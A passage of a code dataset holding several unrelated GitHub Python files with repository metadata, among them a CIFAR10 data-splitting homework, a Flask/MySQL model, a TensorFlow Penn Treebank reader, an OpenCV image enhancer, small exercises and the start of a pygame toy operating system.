generate_random_numbers(batch_size, len(data_in))\n for j in random_indices:\n bootstrap_datasets[i].append(data_in[j])\n return bootstrap_datasets\n\ndef batch_generator(data_in, batch_size):\n \"\"\"\n Yields a batch of specified size, wrapping around to start of data input\n if batch size does not divide evenly into data size\n\n Inputs:\n `data_in` -- CIFAR10 data; and\n `batch_size` -- desired size of the batch\n\n Yields:\n `batch` -- batched dataset of specified size\n \"\"\"\n offset = 0\n overflow_data = [] \n while True:\n np.random.shuffle(data_in)\n offset = 0\n if len(overflow_data) > 0:\n offset = batch_size - len(overflow_data)\n print('data wraparound occurred here; pulling {} records from front'.format(offset))\n yield np.concatenate((overflow_data, data_in[0:offset]))\n overflow_data = []\n\n for x in range(offset, len(data_in), batch_size):\n output_data = data_in[x : x + batch_size]\n if len(output_data) != batch_size:\n overflow_data = output_data\n else:\n yield output_data\n\ndef k_folds_generator(data_in, num_groups):\n \"\"\"\n Split data into a specified number of groups and select one as validation data,\n using the rest as training data. In each \"fold,\" yield a different group as the\n validation data\n\n Inputs:\n `data_in` -- CIFAR10 data; and\n `num_groups` -- number of k-groups to fold\n\n Yields:\n `training_data`, `validation_data` -- tuple of data for training and validation\n \"\"\"\n np.random.shuffle(data_in)\n leftover_records_as_divided = len(data_in) % num_groups\n num_records_in_k_group = math.floor(len(data_in)/num_groups)\n k_groups = []\n previous_k_slice = 0\n for i in range(num_groups):\n k_slice = previous_k_slice + num_records_in_k_group\n if i < leftover_records_as_divided:\n k_slice = k_slice + 1\n k_group = data_in[previous_k_slice:k_slice]\n k_groups.append(k_group)\n previous_k_slice = k_slice\n\n for k in range(0,len(k_groups)):\n training_set = np.array([])\n validation_set = []\n for l in range(len(k_groups)):\n if l == k:\n validation_set = k_groups[l]\n else:\n if training_set.size == 0:\n training_set = k_groups[l]\n else:\n training_set = np.concatenate((training_set,k_groups[l]))\n yield training_set, validation_set\n\ndef plot_cifar_img(data_in):\n \"\"\"\n Generic image plotting function\n \"\"\"\n n = 16\n now = datetime.datetime.now()\n plt.figure(figsize=(20,4))\n for i in range(n):\n ax = plt.subplot(2, n, i+1)\n plt.imshow(data_in[i].reshape(32,32,3))\n plt.gray()\n ax.get_xaxis().set_visible(False)\n ax.get_yaxis().set_visible(False)\n plt.savefig('output/{}.png'.format(now.strftime(\"%Y%m%d-%H%M\")))\n\n# Load CIFAR10 data\n(cifar10_data, _), (_, _) = cifar10.load_data()\ncifar10_data = cifar10_data / 255\n\n# Display sample images\nplot_cifar_img(cifar10_data)\n\n# Perform test of holdout method\nholdout_training_pct=0.7\nholdout_training_data, holdout_validation_data = holdout(cifar10_data,holdout_training_pct)\nprint('size of holdout training data with {} ratio: {} records'.format(holdout_training_pct, len(holdout_training_data)))\nprint('size of holdout validation data with {} ratio: {} records'.format(holdout_training_pct, len(holdout_validation_data)))\n\n# Perform test of k-groups method\nnum_k_groups = random.randint(3,10)\nvalidation_index = random.randint(1, num_k_groups)\nprint('getting {} groups of data with k-folding and setting group {} as the validation set'.format(num_k_groups, validation_index))\nk_train, k_test = k_folds(cifar10_data, num_k_groups, validation_index)\nprint('training set length: {}, 
validation set length: {}'.format(len(k_train),len(k_test)))\n\n# Perform test of bootstrap method\nbootstrap_batch_size = random.randint(100,1500)\nprint('sampling five batches of {} CIFAR10 images'.format(bootstrap_batch_size))\nbootstrap_out = bootstrap(cifar10_data, bootstrap_batch_size, 5)\nfor i in range(len(bootstrap_out)):\n    print('{} images in batch {}'.format(len(bootstrap_out[i]),i+1))\n\n# Perform test of batch generator function\ngen_batch_size = random.randint(10000,20000)\ngenerator_out = batch_generator(cifar10_data, gen_batch_size)\n\nprint('getting ten batches of size {} from CIFAR10 data'.format(gen_batch_size))\n\nfor i in range(10):\n    print('generator produced {} records for iteration {}'.format(len(next(generator_out)),i+1))\n\n# Perform test of k-folds, generator version\nk_fold_gen_num_groups = random.randint(2,15)\nprint('getting {} groups of data with iterative k-folding'.format(k_fold_gen_num_groups))\nk_gen_out = k_folds_generator(cifar10_data, k_fold_gen_num_groups)\nfor i in range(k_fold_gen_num_groups):\n    k_gen_train, k_gen_test = next(k_gen_out)\n    print('fold {}: training size -- {}, validation size -- {}'.format(i+1,len(k_gen_train),len(k_gen_test)))\n","repo_name":"pdavlin/spring-2021-writing-submissions","sub_path":"csci-8920/hw-1/hw-1.py","file_name":"hw-1.py","file_ext":"py","file_size_in_byte":8199,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"} +{"seq_id":"21078809390","text":"from random import randrange\n\n\nlinha=int(input('Number of rows: '))\ncolunas=int(input(\"Number of columns: \"))\nsoma=0\na=[[randrange(0,2) for i in range(colunas)] for j in range (linha)]\n\nfor i in range(linha):\n    for j in range(colunas):\n        print(a[i][j], end=' ')\n        soma+=(a[i][j])\n    print()\nif soma==0:\n    print('Null matrix')\n\n\n","repo_name":"locolome/Curso-de-Python","sub_path":"Aula25.Py/ex5.py","file_name":"ex5.py","file_ext":"py","file_size_in_byte":349,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"} +{"seq_id":"73180833167","text":"from flask_app.config.mysqlconnection import connectToMySQL\nfrom flask import flash\nfrom flask_app.models import ninja\n\nclass Dojo:\n    db_name = 'python-exam-practice'\n\n    def __init__(self, data):\n        self.id = data['id']\n        self.name = data['name']\n        self.created_at = data['created_at']\n        self.updated_at = data['updated_at']\n        self.ninjas = []\n\n    @classmethod\n    def get_all(cls):\n        query = 'SELECT * FROM dojos;'\n        return [cls(result) for result in connectToMySQL(cls.db_name).query_db(query)]\n\n    @classmethod\n    def get_one_with_ninjas(cls, data):\n        query = 'SELECT * FROM dojos LEFT JOIN ninjas ON dojos.id = ninjas.dojo_id WHERE dojos.id = %(id)s ;'\n        results = connectToMySQL(cls.db_name).query_db(query, data)\n        dojo = cls(results[0])\n        for row in results:\n            if row['ninjas.id'] is None:\n                break\n            ninja_data = {\n                'id' : row['ninjas.id'],\n                'created_at' : row['ninjas.created_at'],\n                'updated_at' : row['ninjas.updated_at'],\n                'first_name' : row['first_name'],\n                'last_name' : row['last_name'],\n                'age' : row['age'],\n                'dojo_id' : row['dojo_id'],\n            }\n            dojo.ninjas.append(ninja.Ninja(ninja_data))\n        return dojo\n\n    @classmethod\n    def create(cls, data):\n        query = 'INSERT INTO dojos (name) VALUES ( %(name)s );'\n
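        # Added note (not in the original): keeping the value in `data` and\n        # referencing it as %(name)s lets the connectToMySQL helper bind it as\n        # a query parameter instead of pasting it into the SQL string, which\n        # is what guards this insert against SQL injection (assumed behavior\n        # of the helper shipped with this course project).\n        return connectToMySQL(cls.db_name).query_db(query, 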
data)","repo_name":"kylehench/Python-Public","sub_path":"flask_mysql/belt_review/extra_practice/dojos_and_ninjas2/flask_app/models/dojo.py","file_name":"dojo.py","file_ext":"py","file_size_in_byte":1364,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"} +{"seq_id":"11757367592","text":"import tensorflow as tf\nimport numpy as np\nfrom tqdm import *\n\nfrom glob import glob\nfrom gensim import corpora\nfrom nltk.tokenize import RegexpTokenizer\n\n\nimport time\nimport os\nimport re\n\nclass PTBReader(object):\n _WORD_SPLIT = re.compile(\"([.,!?\\\"':;)(])\")\n _DIGIT_RE = re.compile(r\"(^| )\\d+\")\n tokenizer = RegexpTokenizer(r'@?\\w+')\n\n _BAR = \"_BAR\"\n _UNK = \"_UNK\"\n _EOS = \"\"\n\n _START_VOCAB = [_BAR, _UNK]\n\n def __init__(self,data_dir,dataset_name, vocab_size):\n self.data_dir = data_dir\n self.dataset_name = dataset_name\n self.vocab_size = vocab_size\n self.EOS_ID = self.vocab_size - 1\n self.UNK_ID = self.vocab_size - 2\n\n @staticmethod\n def _int64_feature(value):\n return tf.train.Feature(int64_list=tf.train.Int64List(value=value))\n\n\n def basic_tokenizer(self,sentence):\n \"\"\"Very basic tokenizer: split the sentence into a list of tokens.\"\"\"\n words = PTBReader.tokenizer.tokenize(sentence)\n return [w for w in words] # if w not in PTBReader.cachedStopWords]\n\n def read_words(self):\n worded_sentences = []\n with tf.gfile.GFile(self.filename,\"r\") as f:\n sentences = f.read().split(\"\\n\")\n worded_sentences = [ sent.split() for sent in sentences]\n for i in np.arange(len(worded_sentences)):\n worded_sentences[i].append(\"\")\n\n print(worded_sentences[0])\n\n def initialize_vocabulary(self,vocabulary_path):\n \"\"\"Initialize vocabulary from file.\n We assume the vocabulary is stored one-item-per-line, so a file:\n dog\n cat\n will result in a vocabulary {\"dog\": 0, \"cat\": 1}, and this function will\n also return the reversed-vocabulary [\"dog\", \"cat\"].\n Args:\n vocabulary_path: path to the file containing the vocabulary.\n Returns:\n a pair: the vocabulary (a dictionary mapping string to integers), and\n the reversed vocabulary (a list, which reverses the vocabulary mapping).\n Raises:\n ValueError: if the provided vocabulary_path does not exist.\n \"\"\"\n if tf.gfile.Exists(vocabulary_path):\n vocab = corpora.Dictionary.load(vocabulary_path)\n print(\"vocab length: \",len(vocab.token2id))\n\n return vocab.token2id, vocab.token2id.keys()\n else:\n raise ValueError(\"Vocabulary file %s not found.\", vocabulary_path)\n\n def build_vocab_file(self):\n train_path = os.path.join(self.data_dir, self.dataset_name,\"train\")\n\n context_fname = os.path.join(self.data_dir, self.dataset_name, '%s.context' % self.dataset_name)\n vocab_fname = os.path.join(self.data_dir, self.dataset_name, '%s.vocab%s' % (self.dataset_name, self.vocab_size))\n\n if not os.path.exists(context_fname):\n print(\" [*] Combining all contexts for %s in %s ...\" % (self.dataset_name, train_path))\n context = self.get_all_context(train_path, context_fname)\n else:\n context = tf.gfile.GFile(context_fname, mode=\"r\").read()\n print(\" [*] Skip combining all contexts\")\n\n if not os.path.exists(vocab_fname):\n t0 = time.time()\n print(\"Creating vocabulary %s\" % (vocab_fname))\n print(\"max_vocabulary_size: \", self.vocab_size)\n texts = [word for word in context.lower().split()]# if word not in DataReader.cachedStopWords]\n dictionary = corpora.Dictionary([texts], prune_at=self.vocab_size-2)\n dictionary.filter_extremes(no_below=1, 
no_above=1, keep_n=self.vocab_size-2)\n\n print(\"vocab length: \", len(dictionary.token2id))\n print(\"Tokenize : %.4fs\" % (t0 - time.time()))\n dictionary.save(vocab_fname)\n\n print(\" [*] Convert data in %s into vocab indicies...\" % (train_path))\n self.questions_to_token_ids(train_path, vocab_fname, self.vocab_size)\n\n\n def questions_to_token_ids(self,data_path, vocab_fname, vocab_size):\n vocab, _ = self.initialize_vocabulary(vocab_fname)\n for fname in tqdm(glob(os.path.join(data_path, \"*.txt\"))):\n self.data_to_token_ids(fname, fname + \".ids%s\" % vocab_size, vocab)\n\n\n def data_to_token_ids(self,data_path, target_path, vocab,\n tokenizer=None, normalize_digits=True):\n \"\"\"Tokenize data file and turn into token-ids using given vocabulary file.\n This function loads data line-by-line from data_path, calls the above\n sentence_to_token_ids, and saves the result to target_path. See comment\n for sentence_to_token_ids on the details of token-ids format.\n Args:\n data_path: path to the data file in one-sentence-per-line format.\n target_path: path where the file with token-ids will be created.\n vocabulary_path: path to the vocabulary file.\n tokenizer: a function to use to tokenize each sentence;\n if None, basic_tokenizer will be used.\n normalize_digits: Boolean; if true, all digits are replaced by 0s.\n \"\"\"\n # if not gfile.Exists(target_path):\n if True:\n with tf.gfile.GFile(data_path, mode=\"r\") as data_file:\n counter = 0\n results = []\n for line in data_file:\n token_ids = self.sentence_to_token_ids(line, vocab, tokenizer,\n normalize_digits)\n results.append(\" \".join([str(tok) for tok in token_ids]) + \"\\n\")\n try:\n len_d, len_q = len(results[2].split()), len(results[4].split())\n except:\n return\n with open(\"%s_%s\" % (target_path, len_d + len_q), mode=\"w\") as tokens_file:\n tokens_file.writelines(results)\n\n def sentence_to_token_ids(self,sentence, vocabulary,\n tokenizer=None, normalize_digits=True):\n \"\"\"Convert a string to list of integers representing token-ids.\n For example, a sentence \"I have a dog\" may become tokenized into\n [\"I\", \"have\", \"a\", \"dog\"] and with vocabulary {\"I\": 1, \"have\": 2,\n \"a\": 4, \"dog\": 7\"} this function will return [1, 2, 4, 7].\n Args:\n sentence: a string, the sentence to convert to token-ids.\n vocabulary: a dictionary mapping tokens to integers.\n tokenizer: a function to use to tokenize each sentence;\n if None, basic_tokenizer will be used.\n normalize_digits: Boolean; if true, all digits are replaced by 0s.\n Returns:\n a list of integers, the token-ids for the sentence.\n \"\"\"\n if tokenizer:\n words = tokenizer(sentence)\n else:\n words = self.basic_tokenizer(sentence)\n\n if not normalize_digits:\n return [vocabulary.get(w, self.UNK_ID) for w in words]\n # Normalize digits by 0 before looking words up in the vocabulary.\n return [vocabulary.get(re.sub(PTBReader._DIGIT_RE, \" \", w), self.UNK_ID) for w in words]\n\n\n def get_all_context(self,dir_name, context_fname):\n context = \"\"\n for fname in tqdm(glob(os.path.join(dir_name, \"*.txt\"))):\n with open(fname) as f:\n try:\n lines = f.read().split(\"\\n\")\n\n context += (\" \").join(lines)\n except:\n print(\" [!] 
Error occured for %s\" % fname)\n print(\" [*] Writing %s ...\" % context_fname)\n with open(context_fname, 'w') as f:\n f.write(context)\n return context\n\n\n def convert2TFRecords(self,filenames,mode):\n filename_queue = tf.train.string_input_producer(filenames)\n reader = tf.WholeFileReader()\n key, example = reader.read(filename_queue)\n parsed_example = tf.string_split([example], '\\n')\n filename = os.path.join(\"../data\", \"cnn_\" + mode + \"_0\" + '.tfrecords')\n writer = tf.python_io.TFRecordWriter(filename)\n\n with tf.Session() as sess:\n # Start populating the filename queue.\n coord = tf.train.Coordinator()\n threads = tf.train.start_queue_runners(coord=coord)\n\n for i in range(len(filenames)):\n # Retrieve a single instance:\n if i > 0 and (i % 1000 == 0):\n writer.close()\n filename = os.path.join(\"../data\", \"ptb_train_\" + \"_\" + str(i) + '.tfrecords')\n writer = tf.python_io.TFRecordWriter(filename)\n\n (_, data, _) = sess.run(parsed_example)\n print(data[0])\n sentences = [list(map(int, d.decode().split(\" \"))) + [self.EOS_ID] for d in data]\n\n\n print(sentences[0])\n\n for sent in sentences:\n feature_list = {\n 'input_seq': PTBReader._int64_feature(sent[0:len(sent) - 1 ]),\n 'output_seq': PTBReader._int64_feature(sent[1:])\n }\n\n feature = tf.train.Features(feature=feature_list)\n example = tf.train.Example(features=feature)\n\n writer.write(example.SerializeToString())\n\n writer.close()\n coord.request_stop()\n coord.join(threads)\n\n def read_tf_record_file(self,filename_queue):\n reader = tf.TFRecordReader()\n key, serialized_example = reader.read(filename_queue)\n\n features = {\n 'input_seq': tf.VarLenFeature(tf.int64),\n 'output_seq': tf.VarLenFeature(tf.int64),\n }\n\n parsed_example = tf.parse_single_example(serialized_example, features=features)\n\n return parsed_example['input_seq'], parsed_example['output_seq'], \\\n parsed_example['input_seq'].dense_shape, parsed_example['output_seq'].dense_shape\n\n def reader(self):\n filenames = [\"../data/ptb_train_0.tfrecords\"]\n batch_size = 10\n min_after_dequeue = 1000\n\n filename_queue = tf.train.string_input_producer(\n filenames)\n input_sequence, output_sequence, input_shape, output_shape = self.read_tf_record_file(filename_queue)\n\n input_seq_batch, output_seq_batch, input_shape_batch, output_shape_batch = tf.train.shuffle_batch(\n [input_sequence, output_sequence, input_shape, output_shape], batch_size=batch_size,\n capacity=min_after_dequeue * 3 + 1, min_after_dequeue=min_after_dequeue)\n\n\n\n dense_input_seq_batch = tf.sparse_to_dense(sparse_indices=input_seq_batch.indices,\n output_shape=input_seq_batch.dense_shape,\n sparse_values=input_seq_batch.values,\n default_value=0,\n validate_indices=True,\n name=None)\n dens_output_seq_batch = tf.sparse_to_dense(sparse_indices=output_seq_batch.indices,\n output_shape=output_seq_batch.dense_shape,\n sparse_values=output_seq_batch.values,\n default_value=0,\n validate_indices=True,\n name=None)\n\n input_seq_lengths = tf.reshape(input_shape_batch, [batch_size])\n output_seq_lengths = tf.reshape(output_shape_batch, [batch_size])\n\n with tf.Session() as sess:\n # Start populating the filename queue.\n coord = tf.train.Coordinator()\n threads = tf.train.start_queue_runners(coord=coord)\n\n for i in range(100):\n print(i)\n [input, output, input_lengths,output_length] = sess.run([dense_input_seq_batch,dens_output_seq_batch,input_seq_lengths,output_seq_lengths])\n\n #print(input[0])\n print(input_lengths[0],\" \",output_length[0])\n print(input[0])\n 
print(output[0])\n\n coord.request_stop()\n coord.join(threads)\n\n\n\n\nif __name__ == '__main__':\n ptb_reader = PTBReader(data_dir=\"../data\",dataset_name=\"ptb\", vocab_size=10000)\n #ptb_reader.build_vocab_file() #read_words()\n\n mode = \"train\"\n train_files = glob(os.path.join(\"../data\", \"ptb\",\n mode, \"*.txt.ids%s_*\" % (10000)))\n #ptb_reader.convert2TFRecords(filenames=train_files,mode=mode)\n\n ptb_reader.reader()","repo_name":"samiraabnar/ContextualWordEmbeddings","sub_path":"src/PTBReader.py","file_name":"PTBReader.py","file_ext":"py","file_size_in_byte":12574,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"} +{"seq_id":"4007025675","text":"import cv2\nimport numpy as np\nfrom tkinter import *\nfrom tkinter import filedialog\nfrom PIL import Image, ImageTk\n\ndef open_file_img():\n file_path = filedialog.askopenfilename(filetypes=[(\"JPEG\", \"*.jpeg\"), (\"PNG\", \"*.png\"), (\"All file\", \"*.*\")])\n if file_path:\n label_text_re.config(text=\"Ảnh kết quả\")\n try:\n global img\n img = cv2.imread(file_path)\n img_rgb = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n img_pil = Image.fromarray(img_rgb)\n img_tk = ImageTk.PhotoImage(img_pil)\n\n label_img_or.config(image=img_tk)\n label_img_or.image = img_tk\n except:\n label_text_re.config(text=\"Hãy chọn ảnh\")\n\ndef improve_img():\n if img is not None:\n img_yuv = cv2.cvtColor(img, cv2.COLOR_BGR2YUV)\n # equalize the histogram of the Y channel\n img_yuv[:,:,0] = cv2.equalizeHist(img_yuv[:,:,0])\n # convert the YUV image back to RGB format\n global img_output\n img_output = cv2.cvtColor(img_yuv, cv2.COLOR_YUV2BGR)\n img_rgb = cv2.cvtColor(img_output, cv2.COLOR_BGR2RGB)\n img_pil = Image.fromarray(img_rgb)\n img_tk = ImageTk.PhotoImage(img_pil)\n\n label_img_re.config(image=img_tk)\n label_img_re.image = img_tk\n else:\n label_text_re.config(text=\"Hãy chọn ảnh\")\n\ndef save_img():\n if img is not None:\n file_path = filedialog.asksaveasfilename(defaultextension=[\".jpeg\", \".png\"],filetypes=[(\"JPEG\", \"*.jpeg\"), (\"PNG\", \"*.png\")])\n if file_path:\n cv2.imwrite(file_path, img_output)\n print(\"Lưu ảnh thành công\")\n else:\n label_text_re.config(text=\"Không có ảnh để lưu\")\n\n\nw = Tk()\nw.title(\"Tăng chất lượng hình ảnh thiếu sáng\")\n\nframe_input = Frame(w)\nframe_input.pack()\n\nbutton_file = Button(frame_input, text=\"Chọn ảnh\", command=open_file_img)\nbutton_file.pack(side=LEFT)\n\nbutton_cre = Button(frame_input, text=\"Cải thiện ảnh\", command=improve_img)\nbutton_cre.pack(side=LEFT)\n\nbutton_save = Button(frame_input, text=\"Lưu ảnh\", command=save_img)\nbutton_save.pack(side=LEFT)\n\nframe_output = Frame(w)\nframe_output.pack()\n\nframe_origin = Frame(frame_output)\nframe_origin.pack(side=LEFT)\n\nlabel_text_or = Label(frame_origin, text=\"Ảnh gốc\")\nlabel_text_or.pack()\n\nlabel_img_or = Label(frame_origin)\nlabel_img_or.pack()\n\nframe_resutl = Frame(frame_output)\nframe_resutl.pack(side=LEFT)\n\nlabel_text_re = Label(frame_resutl, text=\"Ảnh kết quả\")\nlabel_text_re.pack()\n\nlabel_img_re = Label(frame_resutl)\nlabel_img_re.pack()\n\nw.mainloop()","repo_name":"nguyenduyquang6122/TH_ma_nguon_mo","sub_path":"BaiTH_09.py","file_name":"BaiTH_09.py","file_ext":"py","file_size_in_byte":2612,"program_lang":"python","lang":"vi","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"} +{"seq_id":"72523828366","text":"import numpy as np\nfrom .pdistributions import Prior_distribution\n\nclass Gen_normal_prior(Prior_distribution):\n def 
__init__(self,mu=0.0,s=10.0,v=2,**kwargs):\n        \"\"\" \n        Independent Generalized Normal prior distribution used for each type of hyperparameters in log-space. \n        If the type of the hyperparameter is multi dimensional (H) it is given in the axis=-1. \n        If multiple values (M) of the hyperparameter(/s) are calculated simultaneously it has to be in a (M,H) array. \n        Parameters:\n            mu: float or (H) array\n                The mean of the generalized normal distribution. \n            s: float or (H) array\n                The scale of the generalized normal distribution.\n            v: float or (H) array\n                The shape or magnitude of the generalized normal distribution.\n        \"\"\"\n        self.update_arguments(mu=mu,\n                              s=s,\n                              v=v,\n                              **kwargs)\n    \n    def ln_pdf(self,x):\n        if self.nosum:\n            return -((x-self.mu)/self.s)**(2*self.v)-np.log(self.s)+np.log(0.52)\n        return np.sum(-((x-self.mu)/self.s)**(2*self.v)-np.log(self.s)+np.log(0.52),axis=-1)\n    \n    def ln_deriv(self,x):\n        return (-(2.0*self.v)*((x-self.mu)**(2*self.v-1)))/(self.s**(2*self.v))\n    \n    def update_arguments(self,mu=None,s=None,v=None,**kwargs):\n        \"\"\"\n        Update the object with its arguments. The existing arguments are used if they are not given.\n        Parameters:\n            mu: float or (H) array\n                The mean of the generalized normal distribution. \n            s: float or (H) array\n                The scale of the generalized normal distribution.\n            v: float or (H) array\n                The shape or magnitude of the generalized normal distribution.\n        Returns:\n            self: The updated object itself.\n        \"\"\"\n        if mu is not None:\n            if isinstance(mu,(float,int)):\n                self.mu=mu\n            else:\n                self.mu=np.array(mu).reshape(-1)\n        if s is not None:\n            if isinstance(s,(float,int)):\n                self.s=s\n            else:\n                self.s=np.array(s).reshape(-1)\n        if v is not None:\n            if isinstance(v,(float,int)):\n                self.v=v\n            else:\n                self.v=np.array(v).reshape(-1)\n        if isinstance(self.mu,(float,int)) and isinstance(self.s,(float,int)) and isinstance(self.v,(float,int)):\n            self.nosum=True\n        else:\n            self.nosum=False\n        return self\n    \n    def mean_var(self,mean,var):\n        return self.update_arguments(mu=mean,s=np.sqrt(var/0.32))\n    \n    def min_max(self,min_v,max_v):\n        mu=(max_v+min_v)/2.0\n        return self.update_arguments(mu=mu,s=np.sqrt(2.0/0.32)*(max_v-mu))\n    \n    def get_arguments(self):\n        \" Get the arguments of the class itself. \"\n        # Get the arguments given to the class in the initialization\n        arg_kwargs=dict(mu=self.mu,s=self.s,v=self.v)\n        # Get the constants made within the class\n        constant_kwargs=dict()\n        # Get the objects made within the class\n        object_kwargs=dict()\n        return arg_kwargs,constant_kwargs,object_kwargs\n","repo_name":"avishart/hpfitter","sub_path":"hpfitter/pdistributions/gen_normal.py","file_name":"gen_normal.py","file_ext":"py","file_size_in_byte":3287,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"} +{"seq_id":"27287356223","text":"import bisect\nimport random\nfrom typing import List\n\n\nclass Solution:\n\n    def __init__(self, w: List[int]):\n        self.runningSum = 0\n        self.sumList = []\n        for num in w:\n            self.runningSum += num\n            self.sumList.append(self.runningSum)\n\n    def pickIndex(self) -> int:\n        num = random.choice(range(self.runningSum))\n        return bisect.bisect(self.sumList, num)\n\n\n# Your Solution object will be instantiated and called as such:\n# obj = Solution(w)\n# param_1 = obj.pickIndex()\n","repo_name":"Xynoclafe/leetcode","sub_path":"medium/randomPickWeight_withBisect.py","file_name":"randomPickWeight_withBisect.py","file_ext":"py","file_size_in_byte":476,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"} +{"seq_id":"8065103253","text":"# Script to plot cosine and its numerical derivative\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ndatos = np.genfromtxt(\"datos.dat\")\n\nx = datos[:,0]\ncos = datos[:,1]\nsen = datos[:,2]\n\nplt.figure()\nplt.plot(x, cos, label=\"cosine\")\nplt.plot(x, sen, label=\"numerical derivative of cosine\")\nplt.xlabel(\"x (radians)\")\nplt.ylabel(\"f (x)\")\nplt.legend()\nplt.title(\"Cosine with its numerical derivative\")\nplt.grid()\nplt.savefig(\"S5C1PLOT.pdf\")\n","repo_name":"aherrera3/MetodosComputacionales","sub_path":"HerreraAngelicaS5C1/plotsS5C1.py","file_name":"plotsS5C1.py","file_ext":"py","file_size_in_byte":436,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"} +{"seq_id":"18607804985","text":"'''\nWE KAN DOers: Nicholas Tarsis, Kosta Dubovskiy\nSoft Dev\n#5\n22-09-28\n'''\n\n'''\nDISCO:\nNicholas learned about randchoice\nKonstantin learned about randrange\nWe reviewed file io with sys.stdin\nWe implemented f strings in our output\n* \nQCC:\nOPS SUMMARY:\n'''\nimport random\nimport sys\nsys.stdin = open(\"krewes.txt\",\"r\")\n\ndef read():\n    s = input().split(\"@@@\")[:-1]\n    people_list = {}\n    for i in s:\n        stuff = i.split(\"$$$\")\n        if stuff[0] not in people_list:\n            people_list[stuff[0]]=[]\n        people_list[stuff[0]].append((stuff[1],stuff[2]))\n    return people_list\n\n\ndef get_devo(krewes):\n    rand_key = random.choice(list(krewes.keys()))\n    rand_devo = krewes[rand_key][random.randrange(len(krewes[rand_key]))]\n    return f'{rand_key}: ({rand_devo[0]}, {rand_devo[1]})'\n\nkrewes = {\n    2:[\"NICHOLAS\", \"ANTHONY\", \"BRIAN\", \"SAMUEL\", \"JULIA\", \"YUSHA\", \"CORINA\", \"CRAIG\", \"FANG MIN\", \"JEFF\", \"KONSTANTIN\", \"AARON\", \"VIVIAN\", \"AYMAN\", \"TALIA\", \"FAIZA\", \"ZIYING\", \"YUK KWAN\", \"DANIEL\", \"WEICHEN\", \"MAYA\", \"ELIZABETH\", \"ANDREW\", \"VANSH\", \"JONATHAN\", \"ABID\", \"WILLIAM\", \"HUI\", \"ANSON\", \"KEVIN\", \"DANIEL\", \"IVAN\", \"JASMINE\", \"JEFFREY\"], \n    7:[\"DIANA\", \"DAVID\", \"SAM\", \"PRATTAY\", \"ANNA\", \"JING YI\", \"ADEN\", \"EMERSON\", \"RUSSELL\", \"JACOB\", \"WILLIAM\", \"NADA\", \"SAMANTHA\", \"IAN\", \"MARC\", \"ANJINI\", \"JEREMY\", \"LAUREN\", \"KEVIN\", \"RAVINDRA\", \"SADI\", 
\"EMILY\", \"GITAE\", \"MAY\", \"MAHIR\", \"VIVIAN\", \"GABRIEL\", \"BRIANNA\", \"JUN HONG\", \"JOSEPH\", \"MATTHEW\", \"JAMES\", \"THOMAS\", \"NICOLE\", \"Karen\"],\n 8:[\"ALEKSANDRA\", \"NAKIB\", \"AMEER\", \"HENRY\", \"DONALD\", \"YAT LONG\", \"SEBASTIAN\", \"DAVID\", \"YUKI\", \"SHAFIUL\", \"DANIEL\", \"SELENA\", \"JOSEPH\", \"SHINJI\", \"RYAN\", \"APRIL\", \"ERICA\", \"JIAN HONG\", \"VERIT\", \"JOSHUA\", \"WILSON\", \"AAHAN\", \"GORDON\", \"JUSTIN\", \"MAYA\", \"FAIYAZ\", \"SHREYA\", \"ERIC\", \"JEFFERY\", \"BRIAN\", \"KEVIN\", \"SAMSON\", \"BRIAN\", \"HARRY\", \"wanying\"]\n }\n\nprint(get_devo(read()))\n","repo_name":"kostadubovskiy/softdev","sub_path":"05_bitstream/krewes.py","file_name":"krewes.py","file_ext":"py","file_size_in_byte":2027,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"} +{"seq_id":"43792120288","text":"# DhilltOS, Graphical edition\n# 2023, Mizu, kevadesu and contributors\nimport pygame, json, sys, os, datetime, time\n\ndef writeText(window, font_name, string, x, y, colour, fs, bg = None):\n\tfont = pygame.font.Font(f'storage/fonts/{font_name}.ttf', fs)\n\ttext = font.render(string, True, colour)\n\tif not bg is None:\n\t\trect = text.get_rect()\n\t\trect.x += x\n\t\trect.y += y\n\t\tpygame.draw.rect(screen, bg, rect)\n\twindow.blit(text, (x,y))\n\ndef putImage(window, image, x, y, mode=\"center\"):\n\trect = image.get_rect()\n\tscreenRect = screen.get_rect()\n\tif mode == \"center\":\n\t\trect.center = (screenRect.centerx + x, screenRect.centery + y)\n\twindow.blit(image, (x,y), rect)\n\nwith open('machine.json', 'r') as f:\n\tMACHINE_SETTINGS = json.loads(f.read())\nVERSION = [1, 0, 0, 'dev']\n\n# initialize it\npygame.init()\n\n# configurations\nframes_per_second = MACHINE_SETTINGS['capped_fps']\nwindow_width = MACHINE_SETTINGS['default_resolution'][0]\nwindow_height = MACHINE_SETTINGS['default_resolution'][1]\n\n# creating window\nscreen = pygame.display.set_mode((window_width, window_height), pygame.RESIZABLE)\nvstring = '.'.join([str(e) for e in VERSION])\npygame.display.set_caption(f'DhilltOS v{vstring} (starting up) @ expects {frames_per_second}FPS')\n\nSYS_IMAGES = {}\nfor img in os.listdir('storage/sys/img'):\n\tif os.path.isfile('storage/sys/img/' + img) and not img.startswith('_'):\n\t\tSYS_IMAGES['.'.join(img.split('.')[:-1])] = pygame.image.load('storage/sys/img/' + img)\nSYS_IMAGES['lock'] = pygame.transform.scale(SYS_IMAGES['lock'], (window_width, window_height))\nscreen.blit(SYS_IMAGES['bootlogo'], (0,0), screen.get_rect()); pygame.display.flip()\nwriteText(screen, 'VictorMono/VictorMono-Bold', 'Resources imported', 0, 0, (255, 255, 255), 12, (0, 64, 0)); pygame.display.flip()\nwriteText(screen, 'VictorMono/VictorMono-Bold', 'Drivers ready', 0, 12, (255, 255, 255), 12, (0, 64, 0)); pygame.display.flip()\n\n# creating our frame regulator\nclock = pygame.time.Clock()\n\ndt = 0\n# forever loop\npygame.display.set_caption(f'DhilltOS v{vstring} (login) @ {frames_per_second}FPS')\nwhile True:\n\t# fill the screen with a color to wipe away anything from last 